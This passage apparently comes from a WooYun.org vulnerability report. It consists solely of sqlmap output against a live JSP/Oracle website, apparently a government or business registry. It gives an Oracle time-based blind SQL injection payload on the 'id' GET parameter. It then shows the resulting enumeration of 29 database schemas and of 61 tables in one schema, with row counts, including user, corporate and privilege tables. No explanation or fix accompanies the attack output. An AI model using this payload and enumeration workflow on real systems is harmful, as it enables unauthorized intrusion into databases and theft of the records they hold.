WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=' AND 7074=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(79)||CHR(103)||CHR(86),5) AND 'ug
jw'='ugjw
---
[00:50:35] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[00:50:35] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[00:50:35] [INFO] fetching database (schema) names
[00:50:35] [INFO] fetching number of databases
[00:50:35] [INFO] resumed: 29
[00:50:35] [INFO] resumed: BAISJSGC
[00:50:35] [INFO] resumed: BAISWEB
[00:50:35] [INFO] resumed: BAISWEBBSQ
[00:50:35] [INFO] resumed: BAISWEBGYY
[00:50:35] [INFO] resumed: BAWEB_BSQ
[00:50:35] [INFO] resumed: BAWEB_SZ
[00:50:35] [INFO] resumed: BAWEB_SZ2
[00:50:35] [INFO] resumed: BAWEB_SZGYY
[00:50:35] [INFO] resumed: COMMONLOGIN
[00:50:35] [INFO] resumed: CTXSYS
[00:50:35] [INFO] resumed: DANGERBAIS
[00:50:35] [INFO] resumed: GYYUSER
[00:50:35] [INFO] resumed: MDSYS
[00:50:35] [INFO] resumed: NETBAISADMIN
[00:50:35] [INFO] resumed: NETBAISSPSZ
[00:50:35] [INFO] resumed: NETBAIS_WLJG
[00:50:35] [INFO] resumed: NETBAIS_WSDJ
[00:50:35] [INFO] resumed: ONLINETALKBSQ
[00:50:35] [INFO] resumed: ONLINETALKGYY
[00:50:35] [INFO] resumed: ONLINETALKSZ
[00:50:35] [INFO] resumed: ORDSYS
[00:50:35] [INFO] resumed: OUTLN
[00:50:35] [INFO] resumed: SYS
[00:50:35] [INFO] resumed: SYSTEM
[00:50:35] [INFO] resumed: SZMHWZ
[00:50:35] [INFO] resumed: WKSYS
[00:50:35] [INFO] resumed: WMSYS
[00:50:35] [INFO] resumed: XDB
[00:50:35] [INFO] resumed: ZJGUSER
available databases [29]:
[*] BAISJSGC
[*] BAISWEB
[*] BAISWEBBSQ
[*] BAISWEBGYY
[*] BAWEB_BSQ
[*] BAWEB_SZ
[*] BAWEB_SZ2
[*] BAWEB_SZGYY
[*] COMMONLOGIN
[*] CTXSYS
[*] DANGERBAIS
[*] GYYUSER
[*] MDSYS
[*] NETBAIS_WLJG
[*] NETBAIS_WSDJ
[*] NETBAISADMIN
[*] NETBAISSPSZ
[*] ONLINETALKBSQ
[*] ONLINETALKGYY
[*] ONLINETALKSZ
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] SZMHWZ
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGUSER

[00:52:42] [INFO] resumed: 152
Database: BAWEB_SZ2
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| T_BULL_WRITEOFF_REVOKE    | 749745  |
| T_BULL_SETTING_UNCHECK    | 496945  |
| T_CORP                    | 408698  |
| T_CORP_BAK                | 224802  |
| T_CORPBACK                | 224802  |
| T_CONTENT_VIEWS           | 176224  |
| T_FENCE_CONTENT_MAP       | 22625   |
| T_CONTENT                 | 21123   |
| T_POST                    | 16236   |
| R$ORG                     | 4932    |
| T_FENCE_PRIVILEGE         | 3679    |
| T_CONTENT_KEYWORD         | 3445    |
| DJNRB_TEMP                | 2547    |
| MAIN_FKINFO               | 2171    |
| T_BULL_CONTRACT_COMP      | 1844    |
| T_COUNTER                 | 1826    |
| T_BULL_CONTRACT_COMP_BACK | 1601    |
| UPLOADFILE                | 1600    |
| T_BULL_NOAPPEAL_COMP      | 1050    |
| T_QL_XZ_OTHER             | 939     |
| T_CONTENT_GOV_INFO        | 933     |
| T_FILE                    | 918     |
| T_BULL_BRAND_COMP         | 787     |
| T_BULL_FAMOUS_COMP        | 622     |
| T_ZWGK_CLASS_BACK         | 588     |
| T_CONTENT_UPLOADFILE      | 484     |
| T_ZWGK_CLASS              | 467     |
| T_FENCE                   | 391     |
| T_QL_XZ_PERMISSION        | 387     |
| T_CONTENT_GOV_INFO_OA     | 368     |
| T_CONTENT_ID_OA           | 362     |
| T_CONTENT_OA              | 362     |
| T_FENCE_BACK              | 324     |
| T_FUNC_PRIVILEGE          | 293     |
| T_ASSIGN_PRIVILEGE        | 254     |
| T_DICT_CORP_TYPE          | 152     |
| T_ZWGK_CLASS0818          | 123     |
| T_CORP_ACCEPT             | 115     |
| T_FILE_OA                 | 108     |
| T_DICT_CATALOG            | 90      |
| T_DICT_UNDER_ORG          | 90      |
| T_PUBLISH_APPLY           | 87      |
| T_CORP_ACCEPTBACK         | 72      |
| T_INVEST_ITEM             | 71      |
| T_DICT_ZWGK               | 54      |
| T_USER                    | 49      |
| T_ADVER_CORP              | 48      |
| T_DICT_DEPT               | 23      |
| T_ASSIGN_PRIVILEGE_DICT   | 18      |
| T_FUNC_PRIVILEGE_DICT     | 18      |
| T_INVEST                  | 16      |
| T_PARAMETER               | 16      |
| T_RSS_SITE                | 12      |
| T_AJ_BASIC_PUBLIC         | 8       |
| T_DICT_CORP_STATUS        | 8       |
| T_FENCE_PRIVILEGE_DICT    | 3       |
| T_DICT_ZWGK_TEST          | 2       |
| T_FILE_BACK               | 2       |
| T_FENCE_PIC               | 1       |
| T_INVEST_TYPE             | 1       |
| T_ORG                     | 1       |
+---------------------------+---------+